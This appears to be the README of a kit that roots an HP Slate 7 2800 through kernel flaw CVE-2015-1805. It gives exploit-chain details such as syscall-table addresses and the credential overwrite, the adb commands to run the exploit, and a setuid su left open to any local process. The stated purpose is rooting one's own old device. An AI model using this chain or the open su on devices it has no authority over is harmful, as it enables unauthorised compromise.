# Root for the HP Slate 7 2800 on Android 4.1.1 **English** | [Русский](README.RU.md) This repository contains a complete, self-contained kit for obtaining persistent root access on the **HP Slate 7 2800** running firmware **1.05.18** and kernel **Linux 3.0.8+** by exploiting the local vulnerability **CVE-2015-1805**. The kit was run on the actual tablet, and the result was verified from a fresh ADB session and after a normal reboot. This is not a universal Android rooting tool. The exploit is specific to this HP kernel configuration. Do not run it on a different model, firmware, or kernel version. ## Verified configuration | Parameter | Verified value | |---|---| | Manufacturer and model | HP Slate 7 2800 | | Android | 4.1.1, API 16, build JRO03H | | Product / device | `t7h` / `pine` | | Processor | Rockchip RK3066, ARMv7 | | Build fingerprint | `hp/t7h/pine:4.1.1/JRO03H/v1.05.18_user:user/release-keys` | | Kernel | `3.0.8+ #13 SMP PREEMPT Tue Jul 28 15:24:30 CST 2015` | | ABI | 32-bit ARM EABI5 | | SELinux | not present in the kernel configuration (`CONFIG_SECURITY` is disabled) | | `/system` partition | ext4, mounted read-only by default | You can inspect the device without making any changes: ```sh adb devices -l adb shell getprop ro.product.model adb shell getprop ro.build.fingerprint adb shell getprop ro.build.version.sdk adb shell cat /proc/version ``` Alternatively, use the script below. It will refuse to proceed if either the fingerprint or kernel version does not match: ```sh ./scripts/check-target.sh ./scripts/check-target.sh ADB_SERIAL ``` ## Repository contents ```text . ├── bin/ │ ├── hp-slate7-cve-2015-1805-root # verified exploit │ ├── hp-slate7-install-root # installs su into /system │ └── hp-slate7-su # minimal setuid-root wrapper ├── src/ │ ├── exploit/ # CVE source and device-specific changes │ ├── installer/install-root.c # installer source │ └── su/rootsh.S # minimal su source ├── scripts/ │ ├── build.sh # rebuilds all three ELF files │ ├── check-target.sh # safe compatibility check │ └── root-device.sh # verifies, uploads, and runs the kit ├── SHA256SUMS # hashes of the verified bin/* files ├── NOTICE # attribution for the original PoC └── LICENSE # GPL-3.0 ``` ### File formats and purposes | File | Format | Size | Purpose | |---|---:|---:|---| | `bin/hp-slate7-cve-2015-1805-root` | ELF 32-bit ARM EABI5, static, unstripped | 2,722,320 bytes | Exploits the CVE, obtains uid 0, and launches the installer | | `bin/hp-slate7-install-root` | ELF 32-bit ARM EABI5, static, stripped | 22,596 bytes | Temporarily remounts `/system` rw, installs `su`, and restores ro | | `bin/hp-slate7-su` | ELF 32-bit ARM EABI5, static, stripped | 656 bytes | Calls `setresgid(0,0,0)` and `setresuid(0,0,0)`, then launches `/system/bin/sh` | SHA-256 checksums of the verified binaries: ```text 6bf8ea09efb9f409dfc7aa5efbc3108e5c1a19fc5b07ae913328ef4639a7644f bin/hp-slate7-cve-2015-1805-root 4857c71efc846636afc5b50d7f3c971c6eb68d3760f652086f2a38c5dc50bc4a bin/hp-slate7-install-root 40626e555f71b71aa5ef7a727e9f6be55e552ef998ae3f49e9390f3e213c610e bin/hp-slate7-su ``` Verification on macOS: ```sh shasum -a 256 -c SHA256SUMS ``` Verification on Linux: ```sh sha256sum -c SHA256SUMS ``` Use the files from `bin/` on the tablet: these are the exact bytes that were verified on the device. The `build/` directory is intended for local rebuilds and is not tracked by Git. ## Vulnerability used [CVE-2015-1805](https://nvd.nist.gov/vuln/detail/CVE-2015-1805) is a flaw in the `pipe_read()` and `pipe_write()` implementations of older Linux kernels. When an atomic copy fails, the code incorrectly continues traversing the `iovec` array, potentially moving a pointer beyond its bounds. As a result, a local unprivileged process can corrupt memory, crash the kernel, or escalate its privileges. A detailed explanation of the mechanism was published on [oss-security](https://www.openwall.com/lists/oss-security/2015/06/06/2). The fixes can be found, among other places, in the upstream Linux commits [`637b58c`](https://github.com/torvalds/linux/commit/637b58c2887e5e57850865839cc75f59184b23d1) and [`f0d1bec`](https://github.com/torvalds/linux/commit/f0d1bec9d58d4c038d0ac958c9af82be6eb18045). The tablet's `3.0.8+` kernel proved vulnerable. Before modifying kernel memory, the same race was tested separately with a harmless probe whose two write targets were both located in the test process's ordinary memory. It reported `CVE-2015-1805: VULNERABLE`, and the tablet remained accessible over ADB. ## Privilege-escalation chain 1. The exploit creates a race between `readv()`, memory mapping changes, and processing a large `iovec` array in the kernel's vulnerable pipe code. 2. The resulting write primitive temporarily replaces the unused entry 222 in `sys_call_table` with the address of a small ARM trampoline in the exploit process. 3. The table address is calculated through the high vector at `0xffff0008`. On the verified device, the instruction is `0xe59ff410`, and its literal points to `vector_swi = 0xc04d0d40`. 4. `vector_swi` and `sys_call_table` were independently assembled from the [official HP Open Source 1.05.10 kernel archive](https://h30671.www3.hp.com/osp/Slate_7_Open_Source_Slate_7_28XX_Open_Source-1.05.10-20140212.tgz) (archive SHA-256: `dd69f0468973714fd9ba22cdfea7e96f39f651ee51b9cb537728d9dcadbafda2`) with the `rk30_t7h_dvt_defconfig` defconfig. Their offset is `0xc4`. The installed firmware has neither OABI nor seccomp, so the table's final runtime address is `0xc04d0e04`. 5. The trampoline consists of exactly six ARM instructions. It obtains the current `sp`, aligns it to the 8,192-byte kernel stack size, and writes `-1` only to `thread_info.addr_limit` at offset 8. It contains no external calls, prologue, or compiler runtime code. 6. Immediately after the temporary syscall returns, entry 222 is restored from entry 223. Both entries are `sys_ni_syscall` in the HP source; the pointer restored on the verified kernel is `0xc051900c`. 7. Once `addr_limit` has been widened, pipe copying reads the current `task_struct`, locates `cred`, and validates the structure using the current uid/gid values, alignment, reference count, and the `real_cred == cred` condition. Only after these checks are the uid/gid values zeroed and the capability masks filled with ones. 8. The process obtains `uid=0` and launches `/data/local/tmp/install-root`. The installer remounts `/system` rw, copies the payload to `/system/xbin/su`, assigns `root:root` ownership and mode `06755`, calls `sync()`, and remounts `/system` read-only. The original `current_thread_info()` function from the old kernel headers was incompatible with modern Clang at `-O0`: an early prototype read an uninitialized word instead of the `sp` register and could crash the kernel. In this repository, it has been replaced with a verified naked ARM trampoline. The early binary is not included in the repository. ## Required software ### To use the ready-made files from `bin/` - a computer running macOS or Linux; Windows is also possible with a suitable ADB USB driver, but this procedure was verified on macOS; - `adb` from Android SDK Platform Tools; - a working USB data cable; - USB debugging enabled and the computer's RSA key accepted on the tablet. You do not need the Android NDK, Java, Python, fastboot, an unlocked bootloader, a custom recovery, a rooting APK, or network access. The exploit and payload are statically linked. ### To rebuild from source - Zig 0.15.2; unpacking the portable archive is sufficient, with no system-wide package installation required; - Bash; - `shasum` or `sha256sum` to verify the result. The Android NDK is still not required: Zig provides an ARM musl cross-toolchain. ## Preparing the tablet 1. Charge the tablet to at least 50%. It was at approximately 80% during the verified run. 2. Boot Android normally and unlock the screen. 3. Enable Developer options -> USB debugging. 4. Connect the cable and accept the USB debugging RSA prompt if Android shows it. 5. Do not run Towelroot, KingRoot, or other rooting applications concurrently. 6. Close unnecessary applications. The exploit creates many threads and comes close to the limits of this old device. Check the connection: ```sh adb devices -l ``` The status must be `device`, not `offline` or `unauthorized`. ## Obtaining root: manual procedure Change to the repository root and first verify that the device matches exactly: ```sh ./scripts/check-target.sh ``` If multiple devices are connected, pass the serial number to every command using `adb -s SERIAL`, or set the `ANDROID_SERIAL` environment variable. Upload the three files using the names they expect for one another: ```sh adb push bin/hp-slate7-cve-2015-1805-root /data/local/tmp/cve-2015-1805-root adb push bin/hp-slate7-install-root /data/local/tmp/install-root adb push bin/hp-slate7-su /data/local/tmp/rootsh-armv7 ``` Set the permissions and flush the staged files to storage: ```sh adb shell 'chmod 755 /data/local/tmp/cve-2015-1805-root /data/local/tmp/install-root /data/local/tmp/rootsh-armv7; sync' ``` Run the exploit **once**: ```sh adb shell '/data/local/tmp/cve-2015-1805-root; rc=$?; echo DEVICE_RC=$rc; exit $rc' ``` Verified successful output: ```text offset:c4 addr:c04d0d40 [+] Done restored syscall 222 to 0xc051900c exploit rc=0 uid=0 gid=0 installer uid=0 gid=0 install-su ok DEVICE_RC=0 ``` If the device disappears from ADB for a few seconds, do not run the exploit again. Wait for it to return: ```sh adb wait-for-device ``` ## Automated procedure The script verifies the fingerprint and kernel, checks the SHA-256 hashes, uploads the files, asks you to enter `ROOT`, runs the exploit, and verifies `uid=0`: ```sh ./scripts/root-device.sh ``` For multiple devices: ```sh ./scripts/root-device.sh --serial ADB_SERIAL ``` The `--yes` option disables the interactive confirmation and is intended only for deliberate automated use: ```sh ./scripts/root-device.sh --serial ADB_SERIAL --yes ``` ## Verifying the result Verify root from a **fresh** ADB shell, not from the exploit process's uid: ```sh adb shell 'id; /system/xbin/su -c id; echo SU_RC=$?' adb shell 'ls -l /system/xbin/su' adb shell 'cat /proc/mounts' | grep ' /system ' ``` Expected output: ```text uid=2000(shell) ... uid=0(root) gid=0(root) ... SU_RC=0 -rwsr-sr-x root root ... su ... /system ext4 ro,... ``` Next, remove only the temporary staging files. The installed `/system/xbin/su` is not removed: ```sh adb shell '/system/xbin/su -c "rm -f /data/local/tmp/cve-2015-1805-root /data/local/tmp/install-root /data/local/tmp/rootsh-armv7; sync"' ``` The kit does not create `/data/local.prop` or modify user data. Perform a normal reboot and then verify persistent root: ```sh adb reboot adb wait-for-device adb shell getprop sys.boot_completed adb shell '/system/xbin/su -c id' ``` The verified tablet produced the following result after reboot: ```text uid=0(root) gid=0(root) ... ``` The installed file was pulled back from the tablet and matched `bin/hp-slate7-su` byte for byte: ```text 40626e555f71b71aa5ef7a727e9f6be55e552ef998ae3f49e9390f3e213c610e ``` ## Using root To run a single command: ```sh adb shell '/system/xbin/su -c id' adb shell '/system/xbin/su -c "ls -la /data"' ``` `hp-slate7-su` is an intentionally minimal wrapper with no Android app, confirmation prompts, daemon, or permission log. Any local process capable of executing `/system/xbin/su` can potentially obtain root. Do not use this obsolete tablet for sensitive data after rooting it, and do not install untrusted APKs. ## Rebuilding from source Specify the path to portable Zig 0.15.2, or add `zig` to `PATH`: ```sh ZIG_BIN=/absolute/path/to/zig ./scripts/build.sh ``` The output will be written to `build/`: ```text build/hp-slate7-cve-2015-1805-root build/hp-slate7-install-root build/hp-slate7-su ``` Check the file formats: ```sh file build/hp-slate7-* ``` All three files must be 32-bit ARM EABI5 ELF files. With the verified Zig 0.15.2 version, the installer and `su` rebuild byte-for-byte identically to the files in `bin/`. The exploit hash may differ because of absolute paths in DWARF and linker metadata; its critical six-instruction trampoline was byte-for-byte identical in the verification build. A rebuild does not replace the checksums of the files in `bin/` that were actually run on the tablet. ## Troubleshooting ### `unauthorized` Unlock the screen and accept the USB debugging RSA key. If the prompt does not appear, reconnect the cable and run `adb devices -l` again. ### `offline` or the device disappears Wait a few seconds and run `adb wait-for-device`. If the tablet has powered off, turn it on normally with the Power button. Do not run a second instance of the exploit concurrently. ### The exploit did not print `[+] Done` The CVE is exploited through a race and may theoretically fail. Reboot the tablet before making a single retry. Do not run the binary in a loop: a failed race can crash the kernel. ### `su` exists, but the command exits with code 127 Verify the file's SHA-256 hash. An early research wrapper handled `argv` incorrectly on ARM and exited with code 127. This repository contains the corrected 656-byte version with SHA-256 `40626e555f71b71aa5ef7a727e9f6be55e552ef998ae3f49e9390f3e213c610e`. ### The HP logo remains on screen, but ADB is already available Check Android's actual state: ```sh adb shell getprop sys.boot_completed adb shell dumpsys window windows ``` `sys.boot_completed=1` means that Android has booted even if the physical display is still showing an old frame. ## What was tested and what was not used Other well-known approaches were safely ruled out or found unsuitable on this device: CVE-2013-6282, CVE-2013-2094, CVE-2012-0056, CVE-2013-4787, Dirty COW, and PingPongRoot. Towelroot/CVE-2014-3153 crashed this kernel and must not be used. CVE-2014-7951 made it possible to write a file through ADB restore path traversal, but the HP firmware did not load `/data/local.prop`, so this method did not provide root. The bootloader uses an old Rockchip loader and did not appear as a standard fastboot device. Flashing a recovery or unlocking the bootloader was not required for this result. ## Provenance and license The exploit code is based on [`mobilelinux/iovy_root_research`](https://github.com/mobilelinux/iovy_root_research), commit `f945796`, which in turn references [`dosomder/iovyroot`](https://github.com/dosomder/iovyroot). Device-specific changes include reducing the thread count, fixing the timeout, using a naked ARM trampoline, restoring the syscall table early, validating `cred`, and disabling the inapplicable SELinux branch. The original notices have been preserved. The repository is distributed under GPL-3.0; see `LICENSE` and `NOTICE`. ## Disclaimer Exploiting kernel memory always carries a risk of rebooting the device, corrupting the system, or losing data. This kit is intended only for an HP Slate 7 2800 that you own and whose firmware matches exactly. Back up any important data, and do not use it on devices belonging to other people. --- Security research and documentation were completed with assistance from OpenAI Codex, powered by [GPT-5.6 Sol](https://developers.openai.com/api/docs/models/gpt-5.6-sol) with Daybreak Blue cybersecurity access.